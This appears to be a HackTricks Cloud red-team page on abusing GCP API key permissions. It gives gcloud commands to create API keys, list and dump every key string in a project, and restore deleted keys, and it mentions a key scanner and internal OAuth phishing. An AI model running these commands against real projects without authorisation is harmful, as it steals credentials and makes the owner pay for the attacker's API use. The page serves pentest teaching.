HackTricks CloudGCP - Apikeys Privesc
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Apikeys
The following permissions are useful to create and steal API keys, not this from the docs: An API key is a simple encrypted string that identifies an application without any principal. They are useful for accessing public data anonymously, and are used to associate API requests with your project for quota and billing.
Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
For more information about API Keys check:
For other ways to create API keys check:
Brute Force API Key access
As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool https://github.com/ozguralp/gmapsapiscanner and check what you can access with the API key.
apikeys.keys.create
This permission allows to create an API key:
gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}
You can find a script to automate the creation, exploit and cleaning of a vuln environment here.
caution
Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could create a project and an API key inside this project.
apikeys.keys.getKeyString , apikeys.keys.list
These permissions allows list and get all the apiKeys and get the Key:
for key in $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done
You can find a script to automate the creation, exploit and cleaning of a vuln environment here.
apikeys.keys.undelete , apikeys.keys.list
These permissions allow you to list and regenerate deleted api keys. The API key is given in the output after the undelete is done:
gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>
Create Internal OAuth Application to phish other workers
Check the following page to learn how to do this, although this action belongs to the service clientauthconfig according to the docs:
GWS - Google Platforms Phishing
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.